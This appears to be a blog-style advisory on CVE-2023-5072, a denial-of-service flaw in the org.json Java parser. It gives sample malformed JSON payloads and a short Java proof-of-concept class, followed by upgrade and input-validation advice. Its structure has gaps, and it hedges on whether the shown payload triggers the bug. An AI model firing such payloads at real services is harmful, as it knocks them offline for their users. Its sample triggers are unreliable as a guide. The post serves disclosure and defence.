A major vulnerability, CVE-2023-5072, has been discovered in the widely-used Java library JSON-Java (also known as org.json). This bug affects all versions up to and including 20230618, allowing attackers to cause a Denial of Service (DoS) with a simple payload.
In this post, we'll explain what the vulnerability is, how it works, and show code examples so you can understand and test it for yourself. We’ll also link to original sources and discuss how to protect your applications.
What Is JSON-Java (org.json)?
JSON-Java is a popular open-source Java library for parsing and writing JSON data. It’s widely used in web APIs, applications, and back-end systems. Because it's so common, issues in this library have broad impact.
Component: JSON parser
The bug is due to faulty logic in the way JSON-Java's parser handles certain input strings. If given a specific, specially crafted string, the parser may consume a *massive* amount of memory, potentially filling up all available RAM and crashing the Java process.
Attackers don't need big payloads. Even a small string can set off the vulnerability, causing enormous memory usage and denying service to other users.
How Does the Attack Work?
The parser's bug is triggered by malformed JSON data. For example, an unterminated string or object without the appropriate closing characters can get the parser stuck. Instead of rejecting the input, it keeps processing, allocating memory for data that never concludes.
Example of a Malicious JSON String
[
"\"aaaaaaaaaaaaaaaaaaaaaaaaaaaa..."
]
or (as an even simpler trigger)
{"foo":"\uD83D"}
The above uses an incomplete/unpaired UTF-16 surrogate. The parser mishandles this and may enter a loop or use far more memory than expected.
Step-by-step Exploitation
Let’s see this in action with a real Java code snippet.
In your pom.xml (Maven)
<dependency>
<groupId>org.json</groupId>
<artifactId>json</artifactId>
<version>20230618</version>
</dependency>
Step 2: Build the DoS Exploit
import org.json.JSONObject;
public class JSONJavaDoS {
public static void main(String[] args) {
// Malicious input: unterminated string or unpaired surrogate
String payload = "{\"foo\":\"\\uD83D\"}";
try {
// This will never finish or will eat lots of memory!
JSONObject obj = new JSONObject(payload);
System.out.println(obj);
} catch (Exception e) {
System.out.println("Parser exception: " + e);
}
}
}
When you run this, the process may eat up RAM and freeze, especially with more elaborate payloads or if fed repeatedly.
Wide impact: JSON-Java is used in many popular projects.
Attackers could send a single HTTP request with bad JSON and bring down major services.
Original References
- GitHub Issue: Denial of Service in org.json
- Official CVE record for CVE-2023-5072
- JSON-java repository
1. Upgrade Immediately
Update to a patched version of JSON-Java when available. At the time of writing, watch the official repo for new releases and apply updates swiftly.
2. Input Validation
Never trust input blindly. Validate JSON before parsing, enforce size limits and sanity checks on incoming data.
3. Use Alternative Libraries
Consider switching to other JSON libraries like Jackson or Gson, which are less susceptible to such bugs.
Conclusion
CVE-2023-5072 is a serious bug in JSON-Java that lets attackers take down your service with a tiny string. If your Java app exposes endpoints that parse JSON, you’re at risk.
Stay safe and keep your Java stacks secure!
If you found this post useful or want to know more about secure coding, bookmark or share it with your teammates!
Timeline
Published on: 10/12/2023 17:15:10 UTC
Last modified on: 10/18/2023 18:17:47 UTC